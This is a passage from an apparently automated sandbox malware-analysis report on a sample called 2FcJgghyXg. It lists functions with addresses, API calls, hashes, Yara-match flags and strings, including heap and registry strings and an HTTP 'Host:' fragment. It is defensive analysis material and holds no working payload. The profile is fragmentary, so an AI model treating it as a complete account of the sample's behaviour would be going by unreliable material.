                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 61a4d732ceed3d2957da7d278b2577a48e12e49a9c3883a3ecfa38a7b1f73e0f
                                      • Instruction ID: 294e0ba2bcf0e700bb10d5484b33f9f3efa403606356a1d0f12c68b0d277713b
                                      • Opcode Fuzzy Hash: 61a4d732ceed3d2957da7d278b2577a48e12e49a9c3883a3ecfa38a7b1f73e0f
                                      • Instruction Fuzzy Hash: 9E90026161600003461572584414617840AD7E0301B51C035E20155A0DC52589A56226
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2BB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1fb98550d16c3b1c1c13a8c537196a6e43d155a12310fcb7ba0f791f4e8dc460
                                      • Instruction ID: a18af58fb88b297b0523bd031405db52cd34228091730c0dbf7b6b059e0d4694
                                      • Opcode Fuzzy Hash: 1fb98550d16c3b1c1c13a8c537196a6e43d155a12310fcb7ba0f791f4e8dc460
                                      • Instruction Fuzzy Hash: 8890023161500802D6907258440464B4405D7D1301F91C029A1026664DCA158B6D77A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2FA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c1c6e5ff74e2cd142810c73572d618f856ca8e254ba68034e126c16387849e36
                                      • Instruction ID: e6875485e6088a5bc3699e3dc126e003099084bf8721a382bd72dd7f4a87c65a
                                      • Opcode Fuzzy Hash: c1c6e5ff74e2cd142810c73572d618f856ca8e254ba68034e126c16387849e36
                                      • Instruction Fuzzy Hash: 4A90022162580042D71066684C14B074405D7D0303F51C129A1155564CC91589755622
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2E60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3c5d49a59fa558cceeb7ab6b9e6fe8c2b32071c43d423dab5a49192739abdbb5
                                      • Instruction ID: 4b5e7ad2a7e9a0c0f8bd6896f86abbd8e2fdeda51955b37664b53e2c2f563b84
                                      • Opcode Fuzzy Hash: 3c5d49a59fa558cceeb7ab6b9e6fe8c2b32071c43d423dab5a49192739abdbb5
                                      • Instruction Fuzzy Hash: 8290027161500402D650725844047474405D7D0301F51C025A6065564EC6598EE96766
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2E40 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1c02e4bc0879aed2cb35224a73660b64d79726bfe65d306bf8c88cbf6536d340
                                      • Instruction ID: bfb54ffa646ae8e4562096bd72332ebb4a0a39c606be6a3f8bac652682703fef
                                      • Opcode Fuzzy Hash: 1c02e4bc0879aed2cb35224a73660b64d79726bfe65d306bf8c88cbf6536d340
                                      • Instruction Fuzzy Hash: F8900221A1500502D61172584404617440AD7D0341F91C036A2025565ECA258AA6A232
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2EF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1324fe25d764069899afe338bb4c6432bd61868340761d6fd4adfe554b3b006b
                                      • Instruction ID: 083df96ebefa3b21cf2d1fa8b0be8103dc88e58a14949513996c0e69253ecdb3
                                      • Opcode Fuzzy Hash: 1324fe25d764069899afe338bb4c6432bd61868340761d6fd4adfe554b3b006b
                                      • Instruction Fuzzy Hash: 5B90026175500442D61062584414B074405D7E1301F51C029E2065564DC619CD666227
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2A90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8cbeddac9fcbfb62e22b551cc2e868759eef4c0a637a182b53ee800e61d5deb0
                                      • Instruction ID: 736ac97a4b1fa6b9fac6d885c305a427dabb6d53f9335c180c357757f79d46f6
                                      • Opcode Fuzzy Hash: 8cbeddac9fcbfb62e22b551cc2e868759eef4c0a637a182b53ee800e61d5deb0
                                      • Instruction Fuzzy Hash: 7E900225625000030615A65807045074446D7D5351351C035F2016560CD62189755222
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                      • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                      • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                      • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A692 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 12 41a692 13 41a693 12->13 14 41a695-41a696 13->14 15 41a70e-41a728 13->15 14->13 17 41a698-41a69d 14->17 18 41a628-41a634 17->18 19 41a69f 17->19 20 41a63c-41a651 RtlAllocateHeap 18->20 21 41a637 call 41af50 18->21 22 41a6a1-41a6c8 call 41af50 ExitProcess 19->22 23 41a6f6-41a70c 19->23 21->20 23->15
                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: &EA
                                      • API String ID: 621844428-1330915590
                                      • Opcode ID: 04aefed6b4a53c549b109a6a032d04f729be984eb12d04e33d23d156fbd74542
                                      • Instruction ID: 78984087dd2b93885b61183f3228e9f114e4047c14a8176ef579f501ac98375c
                                      • Opcode Fuzzy Hash: 04aefed6b4a53c549b109a6a032d04f729be984eb12d04e33d23d156fbd74542
                                      • Instruction Fuzzy Hash: 2F11BEB52052486FCB14DFA8DC80DEB77A9EF88318F05864EF99C97242C630E811CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 27 41a620-41a651 call 41af50 RtlAllocateHeap
                                      APIs
                                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: &EA
                                      • API String ID: 1279760036-1330915590
                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 67threadwindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: c9c5c0f9cf5e8855b38d9752e10a96c28c6fa21dc10e1209740f09d80accad02
                                      • Instruction ID: 579457aec6a1db4f29d5128ce2efc565f21956d79f310fe869c03d01d7efccd1
                                      • Opcode Fuzzy Hash: c9c5c0f9cf5e8855b38d9752e10a96c28c6fa21dc10e1209740f09d80accad02
                                      • Instruction Fuzzy Hash: 7B112971940318B7E721A6A59C03FEF775CAB44B54F04016EFE04BB1C2E6A8690683EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 246 408310-40831f 247 408328-40835a call 41c9f0 call 40ace0 call 414e40 246->247 248 408323 call 41be50 246->248 255 40835c-40836e PostThreadMessageW 247->255 256 40838e-408392 247->256 248->247 257 408370-40838a call 40a470 255->257 258 40838d 255->258 257->258 258->256
                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                      • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                      • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                      • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A655 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 283 41a655-41a658 284 41a65a 283->284 285 41a65d-41a677 call 41af50 283->285 284->285 287 41a67c-41a691 RtlFreeHeap 285->287
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: 96aa7aba5793eacce0408cd5434cc9590dde5726e63991787ef03f6c6ab78f0d
                                      • Instruction ID: 3fe8afaf2eec619fae3077f20bf8a85c8dcd1416268b20534f53cf2a8d2ec830
                                      • Opcode Fuzzy Hash: 96aa7aba5793eacce0408cd5434cc9590dde5726e63991787ef03f6c6ab78f0d
                                      • Instruction Fuzzy Hash: 26E0EDB02002007FDB24DF69CC45EEB7B68AF98354F014548FD4DA7252C630E814CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 288 41a660-41a676 289 41a67c-41a691 RtlFreeHeap 288->289 290 41a677 call 41af50 288->290 290->289
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 291 41a7c0-41a7f4 call 41af50 LookupPrivilegeValueW
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2BCA Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8e2904a0dfb18a68a83ae914bbf0deebb7a01fbb18a388dab7b8a99206669d76
                                      • Instruction ID: bf48843b4088d4ea1d19fbeb73d6a08d0011c4a46f59e73e1fba422cabe345e1
                                      • Opcode Fuzzy Hash: 8e2904a0dfb18a68a83ae914bbf0deebb7a01fbb18a388dab7b8a99206669d76
                                      • Instruction Fuzzy Hash: F8B09B71D054C5C5DF11D764560C717BD44B7D0705F15C065D2031651F8738C5D5E276
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 0179D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                      • API String ID: 0-3532704233
                                      • Opcode ID: 7f223f730cbe9ed1e7b20fa4c5001a9bb7b93910d0d7c983415a241f50b965ec
                                      • Instruction ID: 5d35a0beeee1a23637c4ff7642642467bcb969898c38b46b4096c936ccb2e5c7
                                      • Opcode Fuzzy Hash: 7f223f730cbe9ed1e7b20fa4c5001a9bb7b93910d0d7c983415a241f50b965ec
                                      • Instruction Fuzzy Hash: E4B18F729083459FDB22DF58D484A6FFBE8AB88754F04492EFA89D7310D770D948CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0179D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                      Download Yara Rule
                                      Strings
                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0179D202
                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0179D136
                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0179D263
                                      • @, xrefs: 0179D2B3
                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0179D06F
                                      • @, xrefs: 0179D09D
                                      • @, xrefs: 0179D24F
                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0179D0E6
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                      • API String ID: 0-1356375266
                                      • Opcode ID: 2b61f466e90254dc7bdc9d4f5352e1ec7a4776878d701f9a1a44133be3b3861f
                                      • Instruction ID: 202afe087827ab0edb66ce417e6f2c58f8a12de935d8c8560a08750e684acced
                                      • Opcode Fuzzy Hash: 2b61f466e90254dc7bdc9d4f5352e1ec7a4776878d701f9a1a44133be3b3861f
                                      • Instruction Fuzzy Hash: E8A18DB29083469FDB21DF64D484B5BF7E8AB88715F00492EFA8997241E774D908CF93
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0179F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                      • API String ID: 0-523794902
                                      • Opcode ID: 38e0ab57afbeee7b49cd5259b3e79b0b0c72e0c2fe71a168d01271b0ff72772b
                                      • Instruction ID: 040001dea39cbac2f85db8618c53eb72d0dc28c6505fc7fa78fab6eeddb990ce
                                      • Opcode Fuzzy Hash: 38e0ab57afbeee7b49cd5259b3e79b0b0c72e0c2fe71a168d01271b0ff72772b
                                      • Instruction Fuzzy Hash: 454201712086429FCB15CF28D884B6BFBE1FF88604F1849ADE595CB362DB34D949CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017BB100 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                      • API String ID: 0-122214566
                                      • Opcode ID: a241f26b4bccbc34ee2e70ad5ea2b8058a2be63c4384cbf7641b0b22f1138c1a
                                      • Instruction ID: 5f7a2733b856c315a972c8d4ffb123c8486cc2459d051a08fd114050ec1e3db0
                                      • Opcode Fuzzy Hash: a241f26b4bccbc34ee2e70ad5ea2b8058a2be63c4384cbf7641b0b22f1138c1a
                                      • Instruction Fuzzy Hash: DAC13771E0421A9BDB258B68CCD5BFEFBA0AF46710F188069ED01DB291D7749985C390
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0184F1F5 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                      • API String ID: 0-1745908468
                                      • Opcode ID: 0eb8000f6572982addf3274e4ecfeba7baa9a9758dd8e90cba512bca7fac67f8
                                      • Instruction ID: d40eb3c342b790f50f96c3a362e0bac91e936e2c2776c4cf4e66bdd8d4fb6062
                                      • Opcode Fuzzy Hash: 0eb8000f6572982addf3274e4ecfeba7baa9a9758dd8e90cba512bca7fac67f8
                                      • Instruction Fuzzy Hash: D391FD71A006499FDB22DFACE480AADFBF2FF49714F09800DE641DB252CB359A41CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00416CD9 Relevance: 7.6, Strings: 6, Instructions: 84COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: $: $: $Host$Host: $Unknown
                                      • API String ID: 0-3527920956
                                      • Opcode ID: eb165a0562f200bde798adaa5957e535dd2251fb5f4bb7c8c25d39625f4bd150
                                      • Instruction ID: 5c9aca6ef3a03f03da498c48811cb09c1c32788c6d6e61fa4f382c408f5cb4d2
                                      • Opcode Fuzzy Hash: eb165a0562f200bde798adaa5957e535dd2251fb5f4bb7c8c25d39625f4bd150
                                      • Instruction Fuzzy Hash: BB21D572904348AFC711CF95DC81BEEB7B8EF85304F04859EE9189B282D774A644C7E5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017CF560 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                      Download Yara Rule
                                      Strings
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018101CD
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018101A3
                                      • RTL: Re-Waiting, xrefs: 01810204
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                      • API String ID: 0-2474120054
                                      • Opcode ID: 2a359a73ed7c9c34bee70fe568e2c1eb969dd616510993f6141579558e4bc7c0
                                      • Instruction ID: 64761cf507b49f233e32132497b2a084a5a22129ccce8ff944c1ea57e3f6cd19
                                      • Opcode Fuzzy Hash: 2a359a73ed7c9c34bee70fe568e2c1eb969dd616510993f6141579558e4bc7c0
                                      • Instruction Fuzzy Hash: B9E1CE316087419FD726CF28C884B6ABBE5BB84B14F240A5DF5A5CB2E1D774DA84CB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017C514F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                      Download Yara Rule
                                      Strings
                                      • WindowsExcludedProcs, xrefs: 017C518A
                                      • Kernel-MUI-Language-SKU, xrefs: 017C538B
                                      • Kernel-MUI-Language-Disallowed, xrefs: 017C52B2
                                      • Kernel-MUI-Number-Allowed, xrefs: 017C51A7
                                      • Kernel-MUI-Language-Allowed, xrefs: 017C51DB
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                      • API String ID: 0-258546922
